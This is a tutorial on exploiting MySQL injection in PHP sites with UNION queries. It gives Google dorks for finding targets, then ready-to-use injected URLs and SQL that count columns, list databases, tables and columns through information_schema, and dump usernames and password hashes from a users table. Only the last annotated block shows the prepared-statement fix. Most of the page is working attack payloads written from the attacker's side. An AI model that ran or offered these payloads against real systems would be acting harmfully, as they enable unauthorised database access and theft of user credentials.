MySQL injection is not a single method. A MySQL injection attack can exploit weaknesses in the MySQL version, in the language the web site is written in, or in the programming techniques used to build the site. Here I explain the union exploitation technique.
Finding a web site vulnerable to MySQL injection is a little difficult; finding any site with vulnerabilities at all is relatively difficult. So we use Google dorks to find candidate web sites.
Examples of Google dorks:
.php?id=
.php?news=
.php?game=
.php?article=
Let's assume we find a vulnerable web page at www.example.com/index.php?id=1
Here we send a GET request to www.example.com/index.php with id=1. The PHP file then fetches the row where id=1 from the database and shows it to us.
Such web sites store their data in a MySQL database.
PHP script.
When id=1, the script selects the row where id=1 and shows its title in the title of the web page and its content in the content area of the page.
Here is the PHP script for this operation.
Here the SQL statement is SELECT * FROM pages where id=$id;
Because the value of $id is pasted straight into the statement, we can run SQL of our own by appending it to the value of the GET parameter. But not every web site has this weakness, so before attempting the attack we have to check whether the site has it.
Identifying SQL Injection Vulnerabilities
Take any URL that carries a parameter, put an apostrophe at the end of it and load the page.
If you get a MySQL syntax error like this, the web site may be vulnerable. The error occurs because the apostrophe turns the statement into one that MySQL cannot parse:
SELECT * FROM pages where id=1';
This error appears because the resulting statement violates SQL syntax. Now, such statements operate on the columns of a table; in this example every column of the pages table is selected. Next we need to know how many columns are selected, because only with that number can we use a union clause.
Find the number of columns that are selected
The ORDER BY clause sorts a result in ascending or descending order by a column, and the column can be given by its position. Assume there are 5 columns. Sorting by the 1st column works; sorting by the 3rd works; sorting by the 5th works too. But sorting by the 6th column fails, because there is no 6th column, so we get an error.
So we can sort by a column position that exists, and we cannot sort by one that does not.
Therefore we try positions starting from 1 and increase until the error appears; the last position that works is the number of columns.
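The statements MySQL actually receives for the apostrophe test and the ORDER BY probing, as an added example that is not part of the original page. The schema (database sql2, named after the URL path; tables pages and users with the columns the page enumerates later) and the rows are constructed sample data. Run the statements one at a time, or with mysql --force, because the apostrophe statement is supposed to fail.

```sql
-- Added example (not the page's own code). Database name sql2 is taken from
-- the URL path; the real site's name is never given on the page.
CREATE DATABASE IF NOT EXISTS sql2;
USE sql2;

-- Constructed sample schema: three columns in pages, three in users.
CREATE TABLE pages (
  id      INT PRIMARY KEY,
  title   VARCHAR(100),
  content TEXT
);
CREATE TABLE users (
  id   INT PRIMARY KEY,
  name VARCHAR(50),
  pw   VARCHAR(100)
);
INSERT INTO pages VALUES (1, 'Home', 'Welcome'), (2, 'About', 'About us');
INSERT INTO users VALUES (1, 'admin', 'CONSTRUCTED_HASH_1'),
                         (2, 'bob',   'CONSTRUCTED_HASH_2');

-- The script builds "SELECT * FROM pages where id=$id" by string
-- concatenation, so the request value lands verbatim in the statement.

-- ?id=1  -> the normal request; returns the Home row.
SELECT * FROM pages WHERE id=1;

-- ?id=1' -> the apostrophe test. MySQL rejects this with
--   ERROR 1064 (42000): You have an error in your SQL syntax ...
-- A syntax error surfacing from a URL parameter is the first sign that the
-- value is being spliced into SQL rather than bound as data.
SELECT * FROM pages WHERE id=1';

-- ?id=1 order by N -> probing the column count. ORDER BY 1..3 succeed
-- because the SELECT returns three columns; ORDER BY 4 fails with
--   ERROR 1054 (42S22): Unknown column '4' in 'order clause'
-- so the number of selected columns is 3.
SELECT * FROM pages WHERE id=1 ORDER BY 1;
SELECT * FROM pages WHERE id=1 ORDER BY 2;
SELECT * FROM pages WHERE id=1 ORDER BY 3;
SELECT * FROM pages WHERE id=1 ORDER BY 4;
```

The ORDER BY probe works whether or not the page prints any column, because it only needs the error-versus-no-error difference; that is also why a site that hides database errors makes this step harder.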
Once we know the number of columns we can use the union clause. A UNION combines the results of two SELECT statements, but both must return the same number of columns. Since we now know how many columns are selected, that is no problem.
Using a union clause
http://example.net.hostinghood.com/sql2/index.php?id=1 union select 1, 2, 3
When we fill all the selected columns like this, the values 1, 2, 3 come back in that order.
We do not have to use 1, 2 and 3; any three integers will do. But the same number must not appear twice, because we need to tell the columns apart.
Example of the SQL statement that runs for this request:
SELECT * FROM pages where id=1 union select 1, 2, 3;
This is the statement the database then runs.
With two SELECT statements, two rows come back; the second row holds the integers we gave. In this situation the PHP script takes its data from the first row. So we have to get rid of the real data in the first row.
So we give an id that does not exist in the database, such as a large number (id=2000) or a negative one (id=-1). Such values work because ids like these are not normally used.
Now the 2 and the 3 appear on the web page: the values of the 2nd and 3rd columns are displayed. So we can put any expression in the 2nd and 3rd columns and its value will be shown on the page.
An expression put in the 1st column is not displayed anywhere.
An expression put in the 2nd column replaces the second integer. With the version() function we can show the MySQL version.
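The UNION statements as the server runs them, as an added example that is not part of the original page. It assumes the constructed sql2.pages table (columns id, title, content) with rows constructed for this illustration.

```sql
-- Added example (not the page's own code); assumes sql2.pages (id, title,
-- content) with constructed sample rows.
USE sql2;

-- ?id=1 union select 1,2,3 -> two rows come back. The PHP script prints only
-- the first, which is still the real page, so nothing visible changes:
--   id | title | content
--    1 | Home  | Welcome
--    1 | 2     | 3
SELECT * FROM pages WHERE id=1 UNION SELECT 1, 2, 3;

-- ?id=-1 union select 1,2,3 -> no page has id -1, so the first SELECT
-- contributes nothing and our marker row is the first (and only) row:
--   -1 | 2 | 3   is NOT what comes back; the row is   1 | 2 | 3
-- The page now shows "2" where the title was and "3" where the content was.
-- Column 1 (id) is never printed by the script, so it is useless as a marker.
SELECT * FROM pages WHERE id=-1 UNION SELECT 1, 2, 3;

-- Replace marker 2 with an expression: its value appears in the title slot.
-- MySQL accepts a string here even though column 1 of the first SELECT is
-- an INT; UNION converts the column types as needed.
SELECT * FROM pages WHERE id=-1 UNION SELECT 1, version(), 3;

-- Two values at once, one per visible column. database() and user() are
-- standard MySQL functions like version().
SELECT * FROM pages WHERE id=-1 UNION SELECT 1, database(), user();
```

Because the script shows only the first row, every later payload on this page keeps the id=-1 (or id=20000) prefix so the attacker-controlled row is always the first one returned.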
Get all the Database names
So far we can only get data from this one table, which is not very useful. We want the usernames, passwords or email addresses of users or admins, and normally the table that stores the web page data is not the one that stores user details. So we need to reach other tables. Before doing this we need to know the database name; without it we cannot address them properly.
The information_schema database contains a table called schemata. Its column schema_name holds the names of all databases.
Example:- example.net.hostinghood.com/sql2/index.php?id=20000 union select 1, schema_name, 3 from information_schema.schemata
Send a GET request like this.
Now we see only the name information_schema. The reason is that the first row describes the information_schema database, and when several rows are selected the PHP script shows only the first.
So we use the group_concat() function, which joins the values of all rows into one field, separated by commas. The request then looks like this:
example.net.hostinghood.com/sql2/index.php?id=20000 union select 1, group_concat(schema_name),3 from information_schema.schemata
Now the database names are shown in order.
Get all table names
Now we know the database name, so we can get the table names from the tables table in the information_schema database. We only want the tables of the current database, so we use a WHERE clause. Since the database can have several tables, there can be several rows, and again we use group_concat to get all of them.
Example:- example.net.hostinghood.com/sql2/index.php?id=20000 union select 1, group_concat(table_name), 3 from information_schema.tables where table_schema=database()
Now we see all the table names. Next we want the column names inside the tables; these too can be retrieved from information_schema, from its columns table.
Example:-
example.net.hostinghood.com/sql2/index.php?id=20000 union select 1, group_concat(column_name),3 from information_schema.columns where table_schema=database()
Now we get the column names of both the pages and the users table: id, content, title, name and pw (the password column).
Here the column names we want differ from one another, so we can fetch the data from those columns without any problem.
Example:-
example.net.hostinghood.com/sql2/index.php?id=20000 union select 1, group_concat(name,pw),3 from users,pages
But here the data repeats, because we selected from both tables at once: the two tables are cross joined, so every user row is repeated once per pages row, and a column name that exists in both tables would be ambiguous. So we have to do this instead.
What matters to us is the data in the name and pw columns. We can guess that those two are not in the pages table but in the users table, so we send the request like this:
example.net.hostinghood.com/sql2/index.php?id=20000 union select 1, group_concat(name,pw),3 from users
Now we retrieve the data without repetition.
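The enumeration and extraction steps above (database names, tables, columns, then the users table) as the statements MySQL runs, plus the server-side fix, as an added example that is not part of the original page. It assumes the constructed sql2 database with tables pages (id, title, content) and users (id, name, pw); the user rows are constructed sample data.

```sql
-- Added example (not the page's own code); assumes the constructed sql2
-- database with pages (id, title, content) and users (id, name, pw).
USE sql2;

-- All database names visible to the current account, joined with commas so
-- the script's "first row only" display still shows every name.
SELECT * FROM pages WHERE id=-1
UNION SELECT 1, group_concat(schema_name), 3 FROM information_schema.schemata;

-- Tables of the current database only. database() names the current schema
-- without us having to know it.
SELECT * FROM pages WHERE id=-1
UNION SELECT 1, group_concat(table_name), 3
FROM information_schema.tables WHERE table_schema=database();

-- Columns, prefixed with their table so "id" in pages and "id" in users are
-- told apart. The page's version omits the prefix and lists the columns of
-- every table in one string.
SELECT * FROM pages WHERE id=-1
UNION SELECT 1, group_concat(table_name, '.', column_name), 3
FROM information_schema.columns WHERE table_schema=database();

-- Wrong: FROM users,pages is a cross join, so every user repeats once per
-- page row, and name and pw run together with no separator.
SELECT * FROM pages WHERE id=-1
UNION SELECT 1, group_concat(name, pw), 3 FROM users, pages;

-- Right: one table, a separator between the fields and one between rows.
-- 0x3a is ':' written as a hex literal, so the payload needs no quotes.
SELECT * FROM pages WHERE id=-1
UNION SELECT 1, group_concat(name, 0x3a, pw SEPARATOR '|'), 3 FROM users;
-- -> admin:CONSTRUCTED_HASH_1|bob:CONSTRUCTED_HASH_2

-- group_concat silently truncates its result at group_concat_max_len
-- (default 1024 bytes); raise it for the session on a large users table.
SET SESSION group_concat_max_len = 65535;

-- The fix on the server side: bind the value instead of concatenating it.
-- Shown here as a MySQL prepared statement; PHP does the same through
-- mysqli or PDO prepared statements. The payload is now compared as a
-- value (MySQL converts '-1 union ...' to -1 with a truncation warning),
-- it is never parsed as SQL, and no row matches.
PREPARE get_page FROM 'SELECT * FROM pages WHERE id = ?';
SET @id = '-1 union select 1, group_concat(name, 0x3a, pw), 3 from users';
EXECUTE get_page USING @id;   -- Empty set
DEALLOCATE PREPARE get_page;
```

The last three statements are the check a defender wants: if the same payload returns an empty result against the site's real query, the parameter is bound rather than concatenated, and this whole technique stops at the apostrophe test.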